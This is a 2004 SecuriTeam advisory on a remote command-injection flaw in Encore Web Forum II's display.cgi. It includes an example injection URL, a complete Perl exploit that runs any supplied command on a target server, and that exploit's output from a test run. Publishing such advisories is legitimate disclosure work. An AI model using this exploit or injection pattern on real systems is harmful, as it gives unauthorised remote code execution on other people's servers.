[UNIX] Aborior's Encore Web Forum Remote Vulnerability and Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/05/04

  • Next message: SecuriTeam: "[UNIX] Multiple Cross-Site Scripting Vulnerabilities In cPanel" 
    To: list@securiteam.com
Date: 5 Apr 2004 13:52:06 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Aborior's Encore Web Forum Remote Vulnerability and Exploit
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.aborior.com/encore/index.shtml> Encore Web Forum II is an
    elegant forum system for the World Wide Web. It creates a venue for
    discussion and interaction between visitors of a website. But more than a
    forum, it is a vibrant online community builder and communication tool,
    offering such features as user polls, chat rooms, private messaging, an
    e-mail mailing list, e-mail notification, post pre-moderation, message
    reports, file attachments, IP banning, themes and a myriad of others."

    The web forum software suffers from insufficient sanity checking. Direct
    execution of arbitrary code with the webserver's permissions is possible.

    DETAILS

    Vulnerable Systems:
     * Aborior's Encore version II

    There is insufficient sanitizing on the 'file' variable in the display.cgi
    script that resides at the root forum directory (forumcgi). A command
    embedded within the 'file' variable will automatically execute. The attack
    can be done using only a browser. Example:
    http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a|

    A proof-of-concept exploit is provided which runs the commands 'uname -a;
    id; uptime;' on the server:

    ############################################################
    #!/usr/bin/perl -w
    #
    # Remote Exploit Aborior's Encore Web Forum by Schizoprenic
    # Bug found by k-159 from g-security.tk

    require LWP::UserAgent;
    use Getopt::Std;

    getopts('t:d:c:');
    our($opt_t, $opt_d, $opt_c);

    my $target = $opt_t;
    my $dir = $opt_d;
    my $cmd = $opt_c;

    print "Remote Exploit Aborior's Encore Web Forum by Schizoprenic\n";
    print "Xnuxer Research Laboratory (http://www.infosekuriti.com)\n";
    print "Target: $target\n";
    print "Path Dir: $dir\n";
    print "Command: $cmd\n";

    my $ua = LWP::UserAgent->new;
    $ua->agent("IE/6.0 Windows");
    $ua->timeout(10);
    $ua->env_proxy;

    $req =
    "http://$target$dir/display.cgi?preftemp=temp&page=anonymous&file=|$cmd|";

    my $response = $ua->get($req);
    print "--------------------RESULT--------------------\n";

    if ($response->is_success) {
            print $response->content;
    } else {
            die $response->status_line;
    }

    print "----------------------------------------------\n";

    # EOF by Xnuxer

    A test run yields the following:
    [xnuxer@Server xnuxer]$ perl xdisp.pl -t www.xxxxxxx.com -d
    /encore/forumcgi -c "uname -a;id;uptime;"
    Remote Exploit Aborior's Encore Web Forum by Schizoprenic
    Xnuxer Research Laboratory (http://www.infosekuriti.com)
    Target: www.xxxxxxx.com
    Path Dir: /encore/forumcgi
    Command: uname -a;id;uptime;
    --------------------RESULT--------------------
    Linux ns1.xxxxxxx.com 2.4.20-20.9.2INLDSmpIPvsDs #1 SMP Thu Dec 4 19:28:44
    EST 2003 i686 i686 i386 GNU/Linux
    uid=48(apache) gid=48(apache)
    groups=48(apache),2523(psaserv),10044(webdev)
     01:41:08 up 17 days, 6:00, 0 users, load average: 0.00, 0.03, 0.00
    ----------------------------------------------

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:xnuxer@hackermail.com> k159
    from g-security.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Multiple Cross-Site Scripting Vulnerabilities In cPanel"
    • Quantcast